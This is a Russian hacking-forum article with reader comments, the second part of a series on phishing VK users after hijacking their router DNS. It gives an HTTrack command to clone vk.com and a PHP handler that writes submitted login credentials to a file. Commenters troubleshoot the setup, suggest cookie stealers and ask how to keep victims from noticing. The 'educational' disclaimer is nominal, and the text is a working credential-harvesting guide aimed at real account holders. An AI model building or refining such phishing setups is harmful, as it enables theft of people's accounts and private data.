Статья [1] - Подмена DNS роутера, Граббинг сайта и получение доступов

Статья написана только для образовательных целей. Все делайте на свой страх и риск.​

Всем Салам и Доброй ночи. Люблю сидеть ночью и писать статьи, вообще такое желание возникла в далеком 2012 году, когда еще учился в школе, создал компьютерный блог и писал много статей и в то время блог был достаточно популярным в этой тематике. И теперь вот ночью включаю какую-то комедию и начинаю писать. Итак, если помните в прошлой статье и написал о поднятии dns – прокси и подстановки нашего фейкового dns.

Сегодня продолжим и разберем, как мы будем граббить (делать копию) сайта и будем похищать пароли.

[0] – Немного теории. Что у нас есть?

Итак, давайте подробнее. Какими будут наши шаги:

1. Мы будем копировать сайт, который мы хотим подделать и использовать для фишинга. Делать я это буду с помощью программки HTTrack.

2. После чего переделам форму авторизации и с помощью мини php скрипта, будем сохранять полученные доступы в файл.

На этом все, это все на минимуме, без каких-либо наворотов, тут уже каждый может под себя дорабатывать. От теории перейдем к практике и разберем поподробнее.


[1] – Практика.

[1.1] – Граббинг сайта.

Итак, в первой части, для примера мы брали vk.com. Сейчас давайте, сделаем его копию, и зальем к нам на сервак, вместо того индексного файла. Сделаем это такой командой, с помощью HTTrack:

httrack https://vk.com --headers "Accept-Language: ru-RU,ru;q=0.5" -r2 -F "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" -O "/home/admin/web/vk.com/public_html"

Тут мы указываем url сайта, хедер для русской версии ВК, юзер-агент и куда будем копировать. После граббинга в итоге получаем такое содержимое:

Копию сайта сделали. Теперь перейдем к коду для изменении формы авторизации и написании нашего мини-скрипта.

[1.2] - Получаем доступы к аккаунту

Для того чтобы получать данные, которые пользователь вводит в форме, значение action, просто поменяем, а адрес нашего скрипта, где мы будем принимать данные.
В домашней директории создадим файл handler.php с содержимым:

$file = 'hack.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);

А на главной странице фейка, в параметр action подставим handler.php

Теперь при вводе данных и отправке их при нажатии кнопки, данные отправляются в файл handler.php и там обрабатываются и в виде массива сохраняется в файле.

Вуаля, таким образом мы можем вернуть наш взломанный аккаунт, соседом.

На этом закончим 2ою часть. Всем удачи и не нарушайте закон !

Часть 1
Часть 3

 

[dream-team777]

друзья, подскажите с инжектированием в сайты...

 

[sergey2000art]

При нажатии кнопки вход пишет: "Не удается пройти авторизацию по защищенному соединению. Чаще всего это происходит, когда на Вашем компьютере установлены неправильные текущие дата и время. Пожалуйста, проверьте настройки даты и времени в системе и перезапустите браузер. " . В hack.txt пусто. Копировал со статьи. Я правильно понял, что handler.php должен находится в той же директории, где и index.html? Помогите пожалуйста. Готов предоставить доступ по ssh

 

[tee2be]

старина, жму руку за статью....

 

[Blackout]

также альтернативой httrack может быть прога teleport(загуглите) и есть различные веб-сервисы, которые тоже копируют сайты. могу скинуть один, если это не сочтут за рекламу. правда по опыту в большинстве случаев любой сайт получается немного кривой. в итоге приходится уже самому html и css где то править, но это наверно больше для внимательных жертв))

 

[WUD]

А почему бы просто не кинуть стиллер? Все куки с логинами, паролями и явками у тебя в руках. Плюс куки можно сгрузить в браузер и сразу появляется 99% шанс зайти на аккаунты почты и соц. сетей

 

[M4357R0]

А почему бы просто не кинуть стиллер? Все куки с логинами, паролями и явками у тебя в руках. Плюс куки можно сгрузить в браузер и сразу появляется 99% шанс зайти на аккаунты почты и соц. сетей

Для стиллера нужен доступ на ПК жертвы. Или что-бы он загрузил и запустил что-то.

 

[UsNm]

Салам,классная статья!После сотен фейлов наконец-то получилось, при вводе в адресной строке vk.com я перехожу на фейк.
Скопилось пару вопросов,допустим я каким-то чудом получу сертификат,подправлю CSS код чтоб всё правдоподобней смотрелось.И сделаю страницу в ВК с ошибкой ввода.Но при введении данных,пользователь поймёт что что-то не так, из-за того что он не войдёт на сайт( Как это можно исправить?
Можно сделать так чтобы после введения данных, перед пользователем появлялась подлинная страница ВК,допустим с ошибкой,на которой он введёт данные заново и будет уже на настоящем сайте, ничего не заподозрив.Как такое можно реализовать?Если сервер перезапуститься после создания файла hack.txt,или выполнения кода php,чтобы dnschef перестал работать(можно ли вообще сервер перезагрузить после введения данных?).Но скорей всего всё равно, будет направлять на фейковый сайт, пока историю браузера не почистить.

Остаётся только мониторить не создался ли файл hack.txt, и после этого вручную на роутере менять ДНС сервера,или есть более адекватный вариант?Но если я к примеру проверю через час после того, как данные будут введены, и пользователь сделает ещё несколько попыток входа на сайт,явно поймёт что здесь, что-то не так.

Как сделать всё максимально чисто?

 

[olegtsss]

Добра всем! Что-то у меня файл hack.txt остается всегда пустым. Делал все по инструкции.
1) php handler.php => отрабатывает, файл hack.txt создается, со шаблоном внутри.
2) <form method="POST" name="login" id="quick_login_form" action="handler.php"> => подстановку осуществил.
3) веб сервер apache
Не подскажете в чем дело?